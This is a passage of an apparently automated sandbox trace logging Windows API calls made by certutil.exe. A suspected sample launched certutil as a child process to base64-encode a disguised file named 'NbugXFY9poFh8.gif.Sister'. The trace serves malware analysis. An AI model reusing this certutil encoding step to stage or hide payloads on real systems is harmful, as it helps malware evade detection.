0x2 [0237.257] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfa008ee110*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xfa008ee0c4, lpReserved=0x0 | out: lpBuffer=0xfa008ee110*, lpNumberOfCharsWritten=0xfa008ee0c4*=0x1) returned 1 [0237.381] LocalFree (hMem=0x2e2c6032040) returned 0x0 [0237.382] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0237.382] _vsnwprintf (in: _Buffer=0xfa008ef188, _BufferCount=0xb, _Format="%d", _ArgList=0xfa008ef178 | out: _Buffer="2022") returned 4 [0237.382] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xfa008eef40, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0237.382] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x2e2c6008e60 [0237.382] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0237.382] _vsnwprintf (in: _Buffer=0xfa008ee170, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xfa008ef1c8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0237.382] GetFileType (hFile=0x50) returned 0x2 [0237.382] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfa008ee170*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xfa008ee124, lpReserved=0x0 | out: lpBuffer=0xfa008ee170*, lpNumberOfCharsWritten=0xfa008ee124*=0x31) returned 1 [0237.452] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0237.452] _vsnwprintf (in: _Buffer=0xfa008ee170, _BufferCount=0x1ff, _Format="\n", _ArgList=0xfa008ef1c8 | out: _Buffer="\n") returned 1 [0237.453] GetFileType (hFile=0x50) returned 0x2 [0237.453] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfa008ee170*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xfa008ee124, lpReserved=0x0 | out: lpBuffer=0xfa008ee170*, lpNumberOfCharsWritten=0xfa008ee124*=0x1) returned 1 [0237.525] LocalFree (hMem=0x0) returned 0x0 [0237.526] LocalFree (hMem=0x2e2c600b280) returned 0x0 [0237.526] LocalFree (hMem=0x2e2c60095a0) returned 0x0 [0237.526] SetLastError (dwErrCode=0x80070716) [0237.526] _vsnwprintf (in: _Buffer=0xfa008ef1f8, _BufferCount=0xb, _Format="%d", _ArgList=0xfa008ef1e8 | out: _Buffer="511") returned 3 [0237.526] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xfa008eefb0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0237.526] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2e2c6031d60 [0237.526] PostQuitMessage (nExitCode=0) [0237.527] GetMessageW (in: lpMsg=0xfa008ef7f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xfa008ef7f0) returned 0 [0237.527] LocalFree (hMem=0x2e2c601b650) returned 0x0 [0237.527] LocalFree (hMem=0x2e2c6031eb0) returned 0x0 [0237.527] LocalFree (hMem=0x0) returned 0x0 [0237.527] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0237.528] GetLastError () returned 0x7e [0237.528] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0237.528] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0237.528] DllMain () returned 0x1 [0237.528] LocalFree (hMem=0x2e2c601ba30) returned 0x0 [0237.528] LocalFree (hMem=0x2e2c600c170) returned 0x0 [0237.528] LocalFree (hMem=0x2e2c6031c70) returned 0x0 [0237.528] LocalFree (hMem=0x2e2c6031d30) returned 0x0 [0237.528] LocalFree (hMem=0x2e2c6008e60) returned 0x0 [0237.528] LocalFree (hMem=0x2e2c6031d60) returned 0x0 [0237.528] LocalFree (hMem=0x2e2c6014510) returned 0x0 [0237.528] LocalFree (hMem=0x2e2c600c020) returned 0x0 [0237.529] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0237.529] GetLastError () returned 0x7e [0237.529] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0237.529] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0237.529] DllMain () returned 0x1 [0237.529] exit (_Code=0) Thread: id = 66 os_tid = 0x12a0 Thread: id = 67 os_tid = 0x11b8 Process: id = "23" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x33875000" os_pid = "0x134c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"NbugXFY9poFh8.gif.Sister\" \"NbugXFY9poFh8.gif.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 68 os_tid = 0x1350 [0239.795] GetStartupInfoW (in: lpStartupInfo=0x2d7d3fd60 | out: lpStartupInfo=0x2d7d3fd60*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"NbugXFY9poFh8.gif.Sister\" \"NbugXFY9poFh8.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0239.801] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0239.801] __set_app_type (_Type=0x1) [0239.801] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0239.801] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0239.803] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0239.803] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0239.804] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0239.804] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0239.804] WerSetFlags () returned 0x0 [0239.804] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0239.804] __iob_func () returned 0x7ffcea2dea00 [0239.804] _fileno (_File=0x7ffcea2dea30) returned 1 [0239.805] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0239.806] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0239.807] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0239.807] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0239.807] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0239.807] GetConsoleOutputCP () returned 0x1b5 [0239.962] _vsnwprintf (in: _Buffer=0x2d7d3fcd0, _BufferCount=0xb, _Format=".%d", _ArgList=0x2d7d3fbf8 | out: _Buffer=".437") returned 4 [0239.962] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0239.962] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0239.962] GetFileType (hFile=0x50) returned 0x2 [0239.963] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0239.963] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0239.963] SetThreadUILanguage (LangId=0x0) returned 0x409 [0240.101] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0240.101] GetCommandLineW () returned="certutil -encode \"NbugXFY9poFh8.gif.Sister\" \"NbugXFY9poFh8.gif.Cruel\"" [0240.101] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1381e13b490 [0240.101] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1381e12cbd0 [0240.101] LocalFree (hMem=0x1381e13b490) returned 0x0 [0240.101] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1381e132180 [0240.101] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1381e1325a0 [0240.101] LocalFree (hMem=0x1381e132180) returned 0x0 [0240.101] LocalFree (hMem=0x1381e12cbd0) returned 0x0 [0240.101] LocalFree (hMem=0x0) returned 0x0 [0240.101] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0240.102] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0240.102] GetCommandLineW () returned="certutil -encode \"NbugXFY9poFh8.gif.Sister\" \"NbugXFY9poFh8.gif.Cruel\"" [0240.102] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1381e13ba30 [0240.102] GetSystemTime (in: lpSystemTime=0x2d7d3f9c0 | out: lpSystemTime=0x2d7d3f9c0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0xe, wMilliseconds=0x283)) [0240.102] SystemTimeToFileTime (in: lpSystemTime=0x2d7d3f9c0, lpFileTime=0x2d7d3f9b8 | out: lpFileTime=0x2d7d3f9b8) returned 1 [0240.103] FileTimeToLocalFileTime (in: lpFileTime=0x2d7d3f9b8, lpLocalFileTime=0x2d7d3f980 | out: lpLocalFileTime=0x2d7d3f980) returned 1 [0240.103] FileTimeToSystemTime (in: lpFileTime=0x2d7d3f980, lpSystemTime=0x2d7d3f6f0 | out: lpSystemTime=0x2d7d3f6f0) returned 1 [0240.103] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x2d7d3f6f0, lpFormat=0x0, lpDateStr=0x2d7d3f800, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0240.103] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x2d7d3f6f0, lpFormat=0x0, lpTimeStr=0x2d7d3f700, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0240.103] _vsnwprintf (in: _Buffer=0x2d7d3f70e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x2d7d3f6d8 | out: _Buffer=" 14.643s") returned 8 [0240.103] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1381e13dfd0 [0240.103] SetLastError (dwErrCode=0x80070716) [0240.103] _vsnwprintf (in: _Buffer=0x2d7d3f788, _BufferCount=0xb, _Format="%d", _ArgList=0x2d7d3f778 | out: _Buffer="948") returned 3 [0240.103] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x2d7d3f540, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0240.103] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1381e13b7f0 [0240.104] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x1381e1347c0 [0240.104] LocalFree (hMem=0x1381e13dfd0) returned 0x0 [0240.104] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2d7d3fa30 | out: lpSystemTimeAsFileTime=0x2d7d3fa30*(dwLowDateTime=0xb9b8b712, dwHighDateTime=0x1d6141f)) [0240.104] GetLocalTime (in: lpSystemTime=0x2d7d3fa68 | out: lpSystemTime=0x2d7d3fa68*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0xe, wMilliseconds=0x284)) [0240.104] SystemTimeToFileTime (in: lpSystemTime=0x2d7d3fa68, lpFileTime=0x2d7d3fa40 | out: lpFileTime=0x2d7d3fa40) returned 1 [0240.104] CompareFileTime (lpFileTime1=0x2d7d3fa40, lpFileTime2=0x2d7d3fa30) returned 1 [0240.104] _vsnwprintf (in: _Buffer=0x2d7d3fa78, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x2d7d3fa08 | out: _Buffer="GMT + 2.00") returned 10 [0240.104] LocalFree (hMem=0x1381e13ba30) returned 0x0 [0240.104] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0240.105] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0240.105] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0240.105] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0240.105] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0240.105] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x2d7d3faa8 | out: _Buffer="10.0.15063.447") returned 14 [0240.105] GetACP () returned 0x4e4 [0240.105] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0240.105] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1381e13ba70 [0240.105] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1381e13ba70, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0240.105] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1381e13dd50 [0240.105] _vsnwprintf (in: _Buffer=0x1381e13dd50, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x2d7d3faf8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0240.105] LocalFree (hMem=0x1381e13ba70) returned 0x0 [0240.105] LocalFree (hMem=0x0) returned 0x0 [0240.105] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0240.105] GetACP () returned 0x4e4 [0240.105] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0240.105] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1381e13b810 [0240.105] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1381e13b810, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0240.105] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1381e13df10 [0240.105] _vsnwprintf (in: _Buffer=0x1381e13df10, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x2d7d3faf8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0240.105] LocalFree (hMem=0x1381e13b810) returned 0x0 [0240.105] LocalFree (hMem=0x0) returned 0x0 [0240.106] GetACP () returned 0x4e4 [0240.106] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0240.106] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1381e13bbb0 [0240.106] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1381e13bbb0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0240.106] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1381e13de50 [0240.106] _vsnwprintf (in: _Buffer=0x1381e13de50, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x2d7d3fb28 | out: _Buffer="10.0.15063.447 retail") returned 21 [0240.106] LocalFree (hMem=0x1381e13bbb0) returned 0x0 [0240.106] LocalFree (hMem=0x1381e13dd50) returned 0x0 [0240.106] LocalFree (hMem=0x1381e13df10) returned 0x0 [0240.106] LocalFree (hMem=0x1381e13de50) returned 0x0 [0240.106] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0240.106] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0240.106] GetStockObject (i=0) returned 0x900010 [0240.106] RegisterClassW (lpWndClass=0x2d7d3fc50) returned 0xc1a2 [0240.107] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2002be [0240.195] NtdllDefWindowProc_W () returned 0x0 [0240.195] NtdllDefWindowProc_W () returned 0x1 [0240.202] NtdllDefWindowProc_W () returned 0x0 [0240.212] UpdateWindow (hWnd=0x2002be) returned 1 [0240.212] PostMessageW (hWnd=0x2002be, Msg=0x400, wParam=0x0, lParam=0x1381e12217e) returned 1 [0240.212] GetMessageW (in: lpMsg=0x2d7d3fca0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2d7d3fca0) returned 1 [0240.212] TranslateMessage (lpMsg=0x2d7d3fca0) returned 0 [0240.212] DispatchMessageW (lpMsg=0x2d7d3fca0) returned 0x0 [0240.213] NtdllDefWindowProc_W () returned 0x0 [0240.213] GetMessageW (in: lpMsg=0x2d7d3fca0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2d7d3fca0) returned 1 [0240.213] TranslateMessage (lpMsg=0x2d7d3fca0) returned 0 [0240.213] DispatchMessageW (lpMsg=0x2d7d3fca0) returned 0x0 [0240.213] LocalAlloc (uFlags=0x0, uBytes=0x7a) returned 0x1381e133110 [0240.213] LocalAlloc (uFlags=0x0, uBytes=0x86) returned 0x1381e130400 [0240.213] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0240.213] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0240.213] SetLastError (dwErrCode=0x80070716) [0240.213] _vsnwprintf (in: _Buffer=0x2d7d3f6a8, _BufferCount=0xb, _Format="%d", _ArgList=0x2d7d3f698 | out: _Buffer="465") returned 3 [0240.213] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x2d7d3f460, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0240.213] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1381e131fd0 [0240.214] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0240.214] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0240.214] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x2d7d3f440, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0240.214] GetLastError () returned 0xcb [0240.214] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0240.214] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0240.214] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0240.214] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0240.214] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0240.214] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0240.214] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0240.214] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0240.214] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0240.214] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0240.214] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0240.215] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0240.215] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0240.215] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0240.215] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0240.215] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0240.215] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0240.215] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0240.215] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0240.215] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0240.215] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0240.215] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x2d7d3f108 | out: phkResult=0x2d7d3f108*=0x23c) returned 0x0 [0240.215] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1381e12f340 [0240.215] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x2d7d3f678, lpData=0x2d7d3f6a8, lpcbData=0x2d7d3f670*=0x4 | out: lpType=0x2d7d3f678*=0x0, lpData=0x2d7d3f6a8*=0x0, lpcbData=0x2d7d3f670*=0x4) returned 0x2 [0240.215] LocalFree (hMem=0x1381e12f340) returned 0x0 [0240.215] RegCloseKey (hKey=0x23c) returned 0x0 [0240.215] LocalFree (hMem=0x0) returned 0x0 [0240.216] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1381e14b570 [0240.229] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0240.229] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0240.229] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0240.229] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0240.266] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0240.266] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0240.267] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0240.267] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0240.267] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0240.267] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0240.267] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0240.267] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0240.267] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0240.267] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0240.267] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0240.267] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0240.267] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1381e150220 [0240.267] GetComputerNameW (in: lpBuffer=0x1381e150220, nSize=0x2d7d3f670 | out: lpBuffer="NQDPDE", nSize=0x2d7d3f670) returned 1 [0240.267] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x2d7d3f640 | out: lpBuffer=0x0, nSize=0x2d7d3f640) returned 0 [0240.268] GetLastError () returned 0xea [0240.268] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1381e13b6d0 [0240.268] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x1381e13b6d0, nSize=0x2d7d3f640 | out: lpBuffer="NQdPdE", nSize=0x2d7d3f640) returned 1 [0240.268] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0240.272] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x1381e1506b0, cbCertEncoded=0x12966) returned 0x0 [0240.277] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x1381e1506b0, cbCrlEncoded=0x12966) returned 0x0 [0240.279] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x1381e1506b0, cbEncoded=0x12966, dwFlags=0x8000, pDecodePara=0x2d7d3f520, pvStructInfo=0x2d7d3f5b0, pcbStructInfo=0x2d7d3f5a4 | out: pvStructInfo=0x2d7d3f5b0, pcbStructInfo=0x2d7d3f5a4) returned 0 [0240.280] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x1381e1506b0, cbEncoded=0x12966, dwFlags=0x8000, pDecodePara=0x2d7d3f520, pvStructInfo=0x2d7d3f5b0, pcbStructInfo=0x2d7d3f5a4 | out: pvStructInfo=0x2d7d3f5b0, pcbStructInfo=0x2d7d3f5a4) returned 0 [0240.280] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x1381e1506b0, cbEncoded=0x12966, dwFlags=0x8000, pDecodePara=0x2d7d3f520, pvStructInfo=0x2d7d3f5b0, pcbStructInfo=0x2d7d3f5a4 | out: pvStructInfo=0x2d7d3f5b0, pcbStructInfo=0x2d7d3f5a4) returned 0 [0240.280] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x1381e135660 [0240.290] CryptMsgUpdate (hCryptMsg=0x1381e135660, pbData=0x1381e1506b0, cbData=0x12966, fFinal=1) returned 0 [0240.290] GetLastError () returned 0x8009310b [0240.290] CryptMsgClose (hCryptMsg=0x1381e135660) returned 1 [0240.290] GetFileAttributesExW (in: lpFileName="NbugXFY9poFh8.gif.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\nbugxfy9pofh8.gif.sister"), fInfoLevelId=0x0, lpFileInformation=0x2d7d3f5d0 | out: lpFileInformation=0x2d7d3f5d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1b28d70, ftCreationTime.dwHighDateTime=0x1d5f026, ftLastAccessTime.dwLowDateTime=0xd43ed340, ftLastAccessTime.dwHighDateTime=0x1d5f098, ftLastWriteTime.dwLowDateTime=0xd43ed340, ftLastWriteTime.dwHighDateTime=0x1d5f098, nFileSizeHigh=0x0, nFileSizeLow=0x12966)) returned 1 [0240.290] _vsnwprintf (in: _Buffer=0x2d7d3f5d8, _BufferCount=0xb, _Format="%d", _ArgList=0x2d7d3f5c8 | out: _Buffer="359") returned 3 [0240.290] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x2d7d3f390, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0240.290] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1381e150280 [0240.290] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0240.291] _vsnwprintf (in: _Buffer=0x2d7d3e5c0, _BufferCount=0x1ff, _Format="Input Length = %d", 